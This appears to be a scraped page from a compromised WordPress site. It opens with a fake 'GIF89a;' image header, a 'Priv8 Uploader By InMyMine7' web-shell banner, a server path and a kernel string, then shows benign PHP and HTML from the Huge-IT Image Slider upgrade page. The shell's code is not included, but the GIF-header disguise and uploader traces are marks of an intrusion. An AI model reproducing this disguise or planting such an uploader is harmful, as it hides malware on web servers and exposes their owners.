GIF89a;
Notice: Undefined index: in /home/bs3263/domains/poolq.ee/public_html/wp-content/plugins/classic-editor/classic-editor.php on line 3
Priv8 Uploader By InMyMine7
Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
<?php
if (!defined('ABSPATH')) {
exit; // Exit if accessed directly
}
$license = array(
array(
"title" => "Unlimited Amount Of Images",
"text" => "Create a slider with countless numbers of images in countless numbers of sliders. This is all possible with the Huge-IT Slider plugin.",
"icon" => "-12px -545px"
),
array(
"title" => "Custom Options For Each Slider",
"text" => "Each slider can be customized using Current Options, including size, transition speed, effects and many other useful options. Sliders can have their own customization settings separate from one another.",
"icon" => "-103px -545px"
),
array(
"title" => "Fully Responsive",
"text" => "The slider plugin can be used on different mobile devices as it’s flexible for any screen size. A very important feature is that responsiveness works on the title and description of the slider image as well.",
"icon" => "-188px -545px"
),
array(
"title" => "Title And Description",
"text" => "A Title and Description can be added to all the images within a slider. It overlays beautifully on the slider image with a slightly transparent background.",
"icon" => "-263px -545px"
),
array(
"title" => "Custom URL For Each Slide",
"text" => "When adding an image to a Slider, you can make add a clickable link from it to a specific page or URL.",
"icon" => "-325px -545px"
),
array(
"title" => "A Dosen Style Options",
"text" => "Under General Options in Huge-IT Slider you can find a number of various settings to enhance your slider’s appearance and actions.",
"icon" => "-407px -545px"
),
array(
"title" => "Post Slides",
"text" => "Using Post Slide you can create great looking slides of your posts using posts by category or just recent posts from all categories.",
"icon" => "-12px -632px"
),
array(
"title" => "Youtube Slides",
"text" => "YouTube videos can also be added to slides using our fancy slider plugin. You can add the links to the YouTube videos very easily, make some adjustments and add a number of beautiful effects.",
"icon" => "-99px -632px"
),
array(
"title" => "Vimeo Slides",
"text" => "Vimeo videos can also be added to a slider very easily. As with YouTube items, insert the video links into the slides and choose from the many different enhancement effects and modern features.",
"icon" => "-196px -632px"
),
array(
"title" => "16 Navigation Buttons Style",
"text" => "We have collected a large selection of different navigation arrow types to fit any design of your website.",
"icon" => "-291px -632px"
),
array(
"title" => "Thumbnails Navigation",
"text" => "Navigate images and videos in a slider using thumbnail images. This super feature allows you to preview previous and next slides.",
"icon" => "-379px -632px"
)
);
?>
<div class="responsive grid">
<?php foreach ($license as $key => $val) { ?>
<div class="col column_1_of_3">
<div class="header">
<div class="col-icon" style="background-position: <?php echo $val["icon"]; ?>; ">
</div>
<?php echo $val["title"]; ?>
</div>
<p><?php echo $val["text"]; ?></p>
<div class="col-footer">
<a href="https://huge-it.com/slider/" class="a-upgrate">Upgrade</a>
</div>
</div>
<?php } ?>
</div>
<div class="license-footer">
<p class="footer-text">
You are using the Lite version of the Image Slider Plugin for WordPress. If you want to get more awesome
options,
advanced features, settings to customize every area of the plugin, then check out the Full License plugin.
The full version of the plugin is available in 3 different packages of one-time payment.
</p>
<p class="this-steps max-width">
After the purchasing the commercial version follow this steps
</p>
<ul class="steps">
<li>Deactivate Huge IT Image Slider Plugin</li>
<li>Delete Huge IT Image Slider</li>
<li>Install the downloaded commercial version of the plugin</li>
</ul>
<a href="https://huge-it.com/slider/" target="_blank">Purchase a License</a>
</div>